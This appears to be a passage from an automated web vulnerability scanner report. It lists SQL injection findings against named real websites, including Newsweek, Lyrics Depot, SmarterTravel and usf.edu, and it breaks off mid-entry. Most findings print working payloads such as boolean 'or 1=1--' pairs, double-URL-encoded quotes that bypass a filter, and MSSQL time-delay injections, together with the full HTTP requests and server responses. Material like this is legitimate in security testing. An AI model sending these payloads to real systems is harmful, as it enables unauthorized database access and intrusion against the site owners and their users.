GS_googleAddAdSenseService("ca-pub-8925353227623969");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleUseIframeRendering();
</script>

<script type="text/javascript">
var HELAD_url_part_1 = "server-status?119769932'%20or%201%3d2--%20=1";
var HELAD_url_part_2 = "";
var adparams = new AdSales_pagesetup();
adparams.setPageName("cms_index");
</script>

</head>
<body>

<div id="bigWrapper">



<div id="topNav" class="noRelated">

   <div id="utilityNav">
<ul class="none">
<li><a href="http://video.helium.com" target="_top">Videos</a> |</li>

<li><a href="http://howto.helium.com" target="_top">How To Guides</a> |</li>
<li><a href="http://www.helium.com/content/helium-community" target="_top">Community</a></li>
</ul>

    <span id="loginStatus">


<a href="http://www.helium.com/users/my_account">My Helium</a> | <a href="http://www.helium.com/registration/signup" target="_top">Join</a> | <a href="http://www.helium.com/login?after_login=my_helium" target="_top">Log in</a>


...[SNIP]...

1.10. http://www.lyricsdepot.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.lyricsdepot.com
Path:	/server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 53844502'%20or%201%3d1--%20 and 53844502'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status53844502'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsdepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 4212
Connection: close
Content-Type: text/html

<html>
<head>
<title>The Four Freshmen Lyrics</title>
<meta name=description content="The Four Freshmen Lyrics at the Lyrics Depot">
<meta name=keywords content="The Four Freshmen, lyrics, free, song lyrics">
<link rel="stylesheet" type="text/css" href="/site/inc/stylesheet.css">
<script language="javascript" src="/site/inc/scripts40.js"></script>
<script language="javascript"></script>
</head>
<body bgcolor="#2060A0">

<center>
<table width="760" border="0" bgcolor="#004080" cellpadding="10" cellspacing="0">
<tr>
<td class="path">
Lyrics Depot
</td>
<td class="path" align="right">
<script language="javascript"></script>
</td>
</tr>
<tr>
<td colspan="2" width="760" bgcolor="#909090" align="center">
<script type="text/javascript"></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/LyricsDepot/ROS/tags.js"></script>
</td>
</tr>
</table>
<table width="760" border="0" bgcolor="#004080" cellpadding="4" cellspacing="0">
<tr>
<td width="410" class="path">
<a href="http://www.lyricsdepot.com">Lyrics</a> » <b>The Four Freshmen Lyrics</b>
</td>
<form id="searchbox_016291345183668028587:91lghttsabu" action="http://www.lyricsdepot.com/searchresults.php">
<td width="350" class="path">
<span class="nobr">Find Song Lyrics: <input type="hidden" name="cx" value="016291345183668028587:91lghttsabu" /><input name="q" type="text" size="25" /> <input type="submit" name="sa" value="Search" /><input type="hidden" name="cof" value="FORID:11" /></span>
</td>
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_016291345183668028587%3A91lghttsabu"></script>

...[SNIP]...

Request 2

GET /server-status53844502'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsdepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:19:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 5160
Connection: close
Content-Type: text/html

doh<html>
<head>
<title>Lyrics Depot - Lyrics Not Found</title>
<link rel="stylesheet" type="text/css" href="/site/inc/stylesheet.css">
<script language="javascript" src="/site/inc/scripts40.js"></script>
</head>
<body bgcolor="#2060A0">

<center>
<table width="760" border="0" bgcolor="#004080" cellpadding="10" cellspacing="0">
<tr>
<td class="path">
LyricsDepot.com - Music Song Lyrics Archive
</td>
</tr>
<tr>
<td width="760" bgcolor="#909090" align="center">
<script type="text/javascript"></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/LyricsDepot/ROS/tags.js"></script>
</td>
</tr>
</table>
<table width="760" border="0" bgcolor="#004080" cellpadding="4" cellspacing="0">
<tr>
<td width="410" class="path">
Your #1 source for song lyrics!
</td>
<form id="searchbox_016291345183668028587:91lghttsabu" action="http://www.lyricsdepot.com/searchresults.php">
<td width="350" class="path">
<span class="nobr">Find Song Lyrics: <input type="hidden" name="cx" value="016291345183668028587:91lghttsabu" /><input name="q" type="text" size="25" /> <input type="submit" name="sa" value="Search" /><input type="hidden" name="cof" value="FORID:11" /></span>
</td>
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_016291345183668028587%3A91lghttsabu"></script>
</tr>
</table>
<table width="760" border="0" bgcolor="#C0C0C0" cellpadding="10" cellspacing="0">
<tr>
<td valign="top" bgcolor="#909090" class="menu" width="140">
<p><b>Link to Us</b><br>
Webmasters! Like this song? <a href="javascript:addLink('Lyrics+Depot','http://www.lyricsdepot.com')">Add a link</a> to our site.
<p><b>Bookmark</b><br>
Like the sit
...[SNIP]...

1.11. http://www.newsweek.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.newsweek.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 55974988%20or%201%3d1--%20 and 55974988%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?155974988%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsweek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Age: 0
Cache-Control: max-age=120
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:47:04 GMT
Expires: Sat, 02 Apr 2011 02:49:04 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 1753611622
Content-Length: 4028
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.newsweek.com</h1>

<dl><dt>Server Version: Apache/2.2.8
...[SNIP]...
<dt>Server Built: Jun 18 2010 11:00:02
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 02-Apr-2011 02:47:04 UTC</dt>
<dt>Restart Time: Friday, 18-Feb-2011 18:54:38 UTC</dt>
<dt>Parent Server Generation: 6</dt>
<dt>Server uptime: 42 days 7 hours 52 minutes 25 seconds</dt>
<dt>3 requests currently being processed, 72 idle workers</dt>
</dl><pre>______________W______K___.......................................
_________________________.......................................
____________________K____.......................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection,
"<b><code>S</code></b>" Starting up,
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply,
"<b><code>K</code></b>" Keepalive (read),
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection,
"<b><code>L</code></b>" Logging,
"<b><code>G</code></b>" Gracefully finishing,<br />
"<b><code>I</code></b>" Idle cleanup of worker,
"<b><code>.</code></b>" Open slot with no current process</p>
<p />
PID Key: <br />
<pre>
9234 in state: _ , 9234 in state: _ , 9234 in state: _
923
...[SNIP]...

Request 2

GET /server-status?155974988%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsweek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Age: 0
Cache-Control: max-age=120
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:47:04 GMT
Expires: Sat, 02 Apr 2011 02:49:04 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 1753611626
Content-Length: 4078
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.newsweek.com</h1>

<dl><dt>Server Version: Apache/2.2.8
...[SNIP]...
<dt>Server Built: Mar 9 2010 20:42:14
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 02-Apr-2011 02:47:04 UTC</dt>
<dt>Restart Time: Friday, 18-Feb-2011 18:54:09 UTC</dt>
<dt>Parent Server Generation: 6</dt>
<dt>Server uptime: 42 days 7 hours 52 minutes 54 seconds</dt>
<dt>4 requests currently being processed, 71 idle workers</dt>
</dl><pre>_______KK__________K_____.......................................
_________________________.......................................
................................................................
___W_____________________.......................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection,
"<b><code>S</code></b>" Starting up,
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply,
"<b><code>K</code></b>" Keepalive (read),
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection,
"<b><code>L</code></b>" Logging,
"<b><code>G</code></b>" Gracefully finishing,<br />
"<b><code>I</code></b>" Idle cleanup of worker,
"<b><code>.</code></b>" Open slot with no current process</p>
<p />
PID Key: <br />
<pre>
27905 in state: _ , 27905 in state: _ , 27905 in state: _

...[SNIP]...

1.12. http://www.qwickstep.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.qwickstep.com
Path:	/server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /server-status%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qwickstep.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 00:14:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Cookie
Content-Length: 28254

<html>
<head>
   <title>QwickStep Answers Search Engine</title>
   <meta name="keywords" value="">
   <meta name="description" value="QwickStep Answers Search Engine">
   <meta name="cpalead-verification" con
...[SNIP]...
<a href="/search/view-answer/why-postgresql.html" class="top-weight-1">
...[SNIP]...

1.13. http://www.smartertravel.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.smartertravel.com
Path:	/server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 61858445'%20or%201%3d1--%20 and 61858445'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status61858445'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:54 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=f82e9fa182547509f84a4f1f0c8a14823c1bbf7517bd0e0298a9baacf9d35cd769c0f74c8ddce822a9f3d235f76d2a8384ac7997b4dca7eecf7c290959a769f8; expires=Sun, 01-Apr-2012 02:21:54 GMT; path=/
Set-Cookie: vid=4d9688423d6c39.84045331; path=/; domain=.smartertravel.com
Set-Cookie: uu=7a21d162-badf-46e5-9505-dda26258daf7; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/1361859917?g=http%3A%2F%2Fwww.smartertravel.com%2Ferrordocs%2F404.php&r=&s.eVar37=1%7CI4&s.channel=404+Error&s.eVar24=404+Error&s.pageType=errorPage&s.server=app24&s.eVar11=22&s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript>

</div>

<div id="outer_wrapper">

<div id="wrapper">
   <p class="hide"><a href="#top">Skip navigation</a></p>
<div id="masthead">
           <a href="http://www.smartertravel.com/">
           <img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="Cheap Airfare, Vacation Deals, Car Rental, and Discount Travel - SmarterTravel.com" />
       </a>
       <div class='search_wrapper'><div class='search'>
       <form method="get" action="http://www.smartertravel.com/search/" target="_top">
           <input type="text" class="search_text" name="q" value=""/> <input type="image" class="search_submit" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
       </form>
   </div></div>
   <div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
   
</div>

<ul id="topnav_tabs">
<li id="st_home_page_tab" class="nav_tab"><a href="/" target="_top" rel="nofollow"><span>home</span></a><ul><li>&n
...[SNIP]...

Request 2

GET /server-status61858445'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:54 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=0d3cf84215c4b8a2a44b1d83d5a67dcc648387b449ecbac8670f031dc81b830a817581c669549fdb15b6091f43f06171959e9c6c6f48be1383dd4130c96755c2; expires=Sun, 01-Apr-2012 02:21:54 GMT; path=/
Set-Cookie: vid=4d968842733f73.09988363; path=/; domain=.smartertravel.com
Set-Cookie: uu=20839c2b-dfe9-46c5-bd8a-75604c445a31; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/268758348?g=http%3A%2F%2Fwww.smartertravel.com%2Ferrordocs%2F404.php&r=&s.eVar37=1%7CI4&s.channel=404+Error&s.eVar24=404+Error&s.pageType=errorPage&s.server=app24&s.eVar11=22&s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript>

</div>

<div id="outer_wrapper">

<div id="wrapper">
   <p class="hide"><a href="#top">Skip navigation</a></p>
<div id="masthead">
           <a href="http://www.smartertravel.com/">
           <img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="Cheap Airfare, Vacation Deals, Car Rental, and Discount Travel - SmarterTravel.com" />
       </a>
       <div class='search_wrapper'><div class='search'>
       <form method="get" action="http://www.smartertravel.com/search/" target="_top">
           <input type="text" class="search_text" name="q" value=""/> <input type="image" class="search_submit" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
       </form>
   </div></div>
   <div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
   
</div>

<ul id="topnav_tabs">
<li id="st_home_page_tab" class="nav_tab"><a href="/" target="_top" rel="nofollow"><span>home</span></a><ul><li>&nb
...[SNIP]...

1.14. http://www.tech-recipes.com/server-info [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tech-recipes.com
Path:	/server-info

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 18776569'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /server-info18776569'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-recipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:57:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://www.tech-recipes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 01:57:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http://
...[SNIP]...
<a href="http://www.tech-recipes.com/category/database/" title="mysql, postgresql, oracle, tables, database,">
...[SNIP]...

1.15. http://www.tech-recipes.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tech-recipes.com
Path:	/server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 29838048'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /server-status29838048'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-recipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:32:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://www.tech-recipes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:32:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http://
...[SNIP]...
<a href="http://www.tech-recipes.com/category/database/" title="mysql, postgresql, oracle, tables, database,">
...[SNIP]...

1.16. http://www.travelscream.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.travelscream.com
Path:	/server-status

Issue detail

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelscream.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:47:02 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n22 ( iad-agg-n12), ms iad-agg-n12 ( origin)
ETag: "6a1aeb994e58cb1:0"
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 02:47:02 GMT
Age: 0
Content-Type: text/html
Last-Modified: Sun, 19 Sep 2010 23:01:32 GMT
Connection: keep-alive
Content-Length: 7796

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="_ctl0_Head1"><title>
Travelscream - Error
</title><
...[SNIP]...

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelscream.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:47:02 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n22 ( iad-agg-n28), ms iad-agg-n28 ( origin>CONN)
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=1200
Expires: Sat, 02 Apr 2011 03:07:02 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 241770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...

1.17. http://www.usf.edu/server-info [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.usf.edu
Path:	/server-info

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20192 milliseconds to respond to the request, compared with 49 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-info'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:56:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRSTRAB=DNBJAMADIENPAGGEAJEJHAOO; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta
...[SNIP]...

1.18. http://www.usf.edu/server-info [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.usf.edu
Path:	/server-info

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 20194 milliseconds to respond to the request, compared with 49 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-info?1'waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:54:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRSTRAB=AJBJAMADIEKOLOGDIBAHAPEE; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta
...[SNIP]...

1.19. http://www.usf.edu/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.usf.edu
Path:	/server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20233 milliseconds to respond to the request, compared with 50 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-status'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCBACQA=CECKKBBDAIJFLPOLOBMEBOKM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta
...[SNIP]...

1.20. http://www.usf.edu/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.usf.edu
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 20180 milliseconds to respond to the request, compared with 50 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-status?1'waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:28:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCBACQA=OPBKKBBDICKKJIJNMFJCGNLO; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta
...[SNIP]...

1.21. http://www.x17online.com/server-status [REST URL parameter 1] previous next

Summary

